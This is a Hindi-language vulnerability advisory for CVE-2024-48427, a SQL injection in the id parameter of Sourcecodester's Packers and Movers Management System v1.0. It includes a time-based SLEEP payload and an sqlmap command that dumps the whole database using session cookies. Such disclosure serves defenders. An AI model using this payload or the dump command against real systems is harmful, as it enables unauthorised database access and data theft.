CVE-2024-48427
विवरण
Sourcecodester Packers and Movers Management System v1.0 में एक SQL इंजेक्शन भेद्यता है जो दूरस्थ प्रमाणित उपयोगकर्ताओं को /mpms/admin/?page=services/manage_service&id में id पैरामीटर के माध्यम से मनमाना SQL कमांड निष्पादित करने की अनुमति देती है।
भेद्यता प्रकार
SQL Injection
उत्पाद का विक्रेता
Sourcecodester
प्रभावित उत्पाद कोड आधार:
https://www.sourcecodester.com/php/15360/packers-and-movers-management-system-phpoop-free-source-code.html - 1.0
प्रभावित घटक:
/mpms/admin/?page=services/manage_service&id पर अपडेट सेवा विवरण का id पैरामीटर
हमले के वेक्टर:
- एप्लिकेशन को स्थानीय रूप से सेट करें और दिए गए डिफ़ॉल्ट क्रेडेंशियल का उपयोग करके एडमिन पैनल में लॉगिन करें।
- भेद्य पृष्ठ पर जाएँ: http://localhost/mpms/admin/?page=services/manage_service&id=2
- id पैरामीटर में SQL पेलोड इंजेक्ट करें: http://localhost/mpms/admin/?page=services/manage_service&id=1' OR SLEEP(5)-- puNr
- एप्लिकेशन प्रतिक्रिया का निरीक्षण करें: यदि इंजेक्शन सफल होता है तो पृष्ठ को लोड होने में काफी अधिक समय (5 सेकंड) लगना चाहिए, जिससे पुष्टि होती है कि id पैरामीटर SQL इंजेक्शन के लिए भेद्य है।
- अब डेटाबेस विवरण डंप करने के लिए SQLMap टूल चलाएँ:
- sqlmap -u "http://localhost/mpms/admin/?page=services/manage_service&id=1" --cookie="phpMyAdmin=ju34bd3d8q0jdf6td4ntqscaqd;PHPSESSID=eopn8q1p8c1f5m1v5igjoir8k1;" --dbms mysql -p id --risk 3 --level 4 --dbs --dump
संदर्भ:
- https://owasp.org/www-community/attacks/SQL_Injection
- https://portswigger.net/web-security/sql-injection